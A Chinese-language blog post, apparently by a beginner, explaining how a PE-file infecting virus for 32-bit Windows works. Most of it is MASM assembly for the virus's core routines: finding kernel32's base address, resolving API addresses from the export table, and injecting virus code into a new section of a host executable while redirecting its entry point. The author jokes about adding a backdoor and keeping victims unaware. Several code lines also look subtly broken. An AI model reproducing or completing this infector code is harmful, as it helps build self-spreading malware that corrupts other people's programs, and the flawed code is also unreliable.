关于PE文件病毒的一点心得

关于PE文件病毒的一点心得

PE文件病毒虽然因为传播不及蠕虫已经很少独立存在了,但是仍然有很多病毒把他的感染部分作为一个功能.而且学习PE文件病毒可以让我们对PE的格式更好的了解,而加壳程序的外壳部分也运用到了和PE文件病毒类似的技术,所以还是可以了解下的
我也是刚学习这方面的东西,就把一点点心得写了下来.参考了罗云彬的<windows环境下32位汇编语言程序设计>在下菜鸟一只,望高手指教~
首先说说PE文件病毒的工作方式．一个PE文件病毒基本上有这几个功能：
１）获取kernel32.dll的基地址
２）通过所获得的kernel32的基地址通过dll的PE文件格式中的输出表获得以后要使用到的API的地址，并将他们存放在变量或是栈中，将来所调用的API直接通过CALL这些地址来实现．
３）查找要感染的文件并获得他们的基地址（通过CreateFile,CreateFileMapping,ViewOfMapFile将文件打开，当然调用的是getapi所找到的地址。其他过程和一般的程序没什么区别，所以就不写在这里了）
４）通过获得的文件的基地址来根据文件的PE文件格式来将病毒代码注入到该文件中，在这里有两种方法，一是通过给程序添加一个节（section)来将病毒注入，另一种是选取一个未用完的节（因为节在内存中是按１０００为单位对齐的）．
当然了，病毒不可能只是复制自己而什么都不做，不然的话就没有破坏性了．．．在代码里都会有一段用来做点坏事～～比如开个后门～～
好了，我们来具体看看这些有趣的东西～～～嘿嘿
第一个部分，获取K32的基地址
_GetK32 proc
local @dwReturn
pushad
mov @dwReturn,0　　　　　　　;返回值，先设为0（即false）
mov edi,_dwKernelRet　　　 ;这里的_dwKernel32Ret　是[esp]，当程序通过ret指令结 ;束的时候,系统会通过调用 CreateProcess()函数来启动进 ;程，这时的堆栈中所存放的值就是Kernel32所在的那部分 ;地址段中的一个地址。因此，如果我们在程序中的开头部 ;分取出[esp]的值，就能通过这个值定位 kernel32的基地 ;址　　　　　　　　　　　　
and edi,0ffff0000h ;因为WINDOWS是分页系统，4K一页，所以这条语句就是将 ;edi指向该页的基地址
@1: ;由于分页系统中模块加载都是从每一页的页首开始，所以 ;基地址总每页的页首地址
cmp word ptr [edi],'ZM' ;这一段是判断是否到达K32的基地址
jnz @1
mov esi,edi
add esi,[esi+003ch]
cmp word ptr [esi],'EP'
mov @dwReturn,edi
jz @2 ;确认找到的是K32的基地址，跳
sub edi,010000h ;不是K32的基地址，则查看是不是在前一页
cmp edi,070000000h
jb @2 ;如果小于07000000则不查找，因为K32不会在小于 ;070000000前的页，在这里为了简单没有考虑出错情况，一 ;般出错的话就直接结束吧
jmp @1
@2: add esp,0ch
popad
mov eax,@dwReturn ;将找到的K32的基地址给EAX返回
ret
_GetK32 endp
第2部分，GetApi部分
_GetApi proc ;输入ESI（指向一个API名字）输出该API的地址
mov edx,esi ;先将该API名字的首地址备份个
@1: cmp byte ptr [esi],0 ;这一段是获取API名字的长度，因为以0作为字符串结束的 ;标记，所以比较esi所指地址的值是否为0来判断是否是字 ;符串的结束
jz @2 ;是，跳
inc esi ;不是则让ESI指向下一个字符，继续判断
jmp @1
@2的目的就是获取，输出地址表eat,存放输出的API的名字的数组ent和输出序数表eot的VA。之所以要取这3个是因为eat[x]的所对应的 API并不就是ent[x]对应的API.实际上他们3者的API对应关系是ent[x]'API=eat[eot[x]]'API
@2: inc esi
sub esi,edx ;esi-edx就是API的字符串长度了
mov ecx,esi
xor eax,eax
mov count,ax ;COUNT存放所输入的API在ENT的数组序号（即对应关系中的 ;X）
mov esi,hDllKernel32
add esi,3ch ;即让ESI指向NT头，3c是dos头的长度
mov esi,[esi+78h] ;让ESI指向DATA DIRECTORY数组的首地址（这个值是RVA）
;由于输出表是放在数组的第一个，所以所指的这个数组的 ;首地址的RVA就是输出表的首地址的RVA
add esi,hDllKernel32 ;输出表的VA
add esi,1ch ;ESI指向AddressOfFunctions
lodsd ;读取AddressOfFunctions的内容
add eax,hDllKernel32 ;EAT(输出地址表）的VA
mov eatVA,eax
lodsd ;读取AddressOfNames的内容
add eax,hDllKernel32 ;ENT（存放输出的API的名字的数组）
mov entVA,eax
lodsd ;读取输出序数表EOT的RVA
add eax,hDllKernel32 ;VA
mov OrdinalVA,eax
mov esi,entVA
而@3就是先比较所要得到地址的API名和ENT中的各名字对比找到EAT，ENT，EOT对应关系中的X，然后得到该API的地址
@3: push esi
lodsd
add eax,hDllKernel32 ;数组指针
mov esi,eax
mov edi,edx
push ecx ;该API名字的长度
cld
rep cmpsb ;比较这时数组指针所指的API名是否是输入的那个API名
pop ecx
jz @4 ;是，跳
pop esi
add esi,4 ;不是，指向下一个数组中的API名字继续比较
inc Count
jmp @3
@4: pop esi
mov eax,Count ;进行对应关系的转换
shl eax,1
add eax,OrdinalVA ;EAX中地址存放的就是EOT[X]
xor esi,esi
xchg eax,esi
lodsw
shl eax,2
add eax,eatVA
mov esi，eax
lodsd ;读取eat[eot[x]]的内容（API的RVA地址）
add eax,hDllKernel32 ；VA
ret
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetApis proc ;输入的是ESI（指向存放API名字的数组）和EDI（指向存放 ;API函数所在地址的数组）
@1: push esi
push edi
call _GetApi
pop edi
pop esi
stosd
@2: cmp byte ptr [esi],0 ；判断是否是一个API名的结束
jz @3
inc esi
jmp @2
@3: cmp word ptr [esi],0bbh ；判断是否是数组的结束
jz @4 ;是，则结束
inc esi ；不是，指向下一个API名，继续查找他的地址
jmp @1
@4: ret
_GetApis endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
第3部分：感染~~
如之前所讲的，感染有两种方式，在这里我们采用了第一种方式。这个函数的工作方式是这样的：
1）将代码添加到一个新节中，我们先将一个指针指向文件中的最后的一个节的结尾，从这里把我们的代码写到后面。另一个指针指向到最后的那个节对应的 section header修改PointerToRawData和SizeOfRawData让它指向的是我们添加的那个节。
2）记录下未感染的OEP，因为在我们的代码结束的时候要让宿主程序正常执行（除非你想让人家知道自己被感染了。。。）所以我们要先记录他的OEP，在我们程序结束的时候运用一个JMP跳过去。
3）修改nt头中的AddressOfEntryPoint，让它指向的是我们的添加的代码
_Inject proc ;lpFile是文件的基地址，lpPEHead是nt头
mov esi,_lpPEHead
mov edi,_lpPEHead
movzx eax,[esi+06h] ;NumberOfSections
dec eax
mov ecx,28h ;28h为一个section header的长度
mul ecx ;eax中为所有section header部分的长度
add esi,eax
add esi,78h ;减去data_directory的nt header长度
mov edx,[edi+74h]
shl edx,3 ;edx存放计算出的data_directory长度
add esi,edx ;esi指向了最后一个section header
mov _Oldep,[edi+28h] ;存下AddressOfEntryPoint
mov _ImageBase,[edi+34h]
mov _SizeOfRawData,[esi+10h]
mov _PointerToRawData,[esi+14h]
mov edx,_PointerToRawData
add edx,_SizeOfRawData
mov _AllSecHeadLength,edx
mov eax,_SizeOfRawData
add eax,[esi+0ch] ;+VA,则在eax所指的地址添加病毒代码，且此时的EAX为new ；ep
mov _Newep,eax
mov [edi+28h],eax ;将旧的ep覆盖为新的
mov eax,[esi+10h] ;
invoke _Align,_dwVirusSize,[esi+3ch] ;将我们的节对齐
mov [esi+08h],eax ;更新对齐后的SIZEOFRAWDATA和VIRTUALSIZE
mov [esi+10h],eax
add eax,[esi+0ch] ;eax=size of image(加上了新加的节的长度）
mov [edi+50h],eax
or dword ptr [esi+24h],0a0000020h ；该节属性定为可执行代码
mov dword ptr [edi+4ah],"Zalone" ；节的名字enolaZ~~~~~~
lea esi,[ebp+virus_start] ;把我们的代码移进去
mov edx,_AllSecHeadLength
xchg edi,edx
add edi,_lpFile
mov ecx,virus_size
repnz movsb ；写代码的循环
jmp UnMapFile ;完成，关闭这个文件
ret
InjectFile endp
好了，关键的部分就是这个样子，主体部分我觉得其实是最简单的，所以没贴出来.感觉代码还不是很优化，另外这个东西也没有一些反调试或是隐藏自己的方法. 另外在对eot,ent,eat那部分感觉的讲解还不是很清晰，不过那个表达式是很清晰的说明了,可能是好久没写过作文了吧...